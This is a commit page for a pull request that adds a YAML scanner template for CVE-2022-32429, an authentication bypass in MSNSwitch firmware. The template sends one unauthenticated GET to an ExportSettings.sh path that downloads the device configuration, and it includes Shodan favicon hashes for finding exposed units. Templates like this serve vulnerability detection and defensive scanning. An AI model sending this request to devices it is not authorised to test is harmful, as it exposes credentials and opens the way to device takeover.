Merge pull request #6594 from theabhinavgaur/patch-11

Create CVE-2022-32429.yaml
patch-1
Dhiyaneshwaran 2023-01-26 23:30:59 +05:30 committed by GitHub
commit c088afb382
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2022-32429
info:
name: MSNSwitch Firmware MNT.2408 - Configuration Dump
author: theabhinavgaur
severity: critical
description: |
The vulnerability is an authentication bypass which allows the full configuration of the unit to be downloaded. The credentials obtained here can then be used via a local subnet vulnerability to obtain a full root shell on the device.
reference:
- https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
- https://elifulkerson.com/CVE-2022-32429/
- https://nvd.nist.gov/vuln/detail/CVE-2022-32429
classification:
cve-id: CVE-2022-32429
metadata:
verified: "true"
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
tags: cve,cve2022,msmswitch,unauth,switch,config,dump
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SSID1"
- type: regex
part: header
regex:
- 'filename="Settings(.*).dat'
- 'application/octet-stream'
condition: and
- type: status
status:
- 200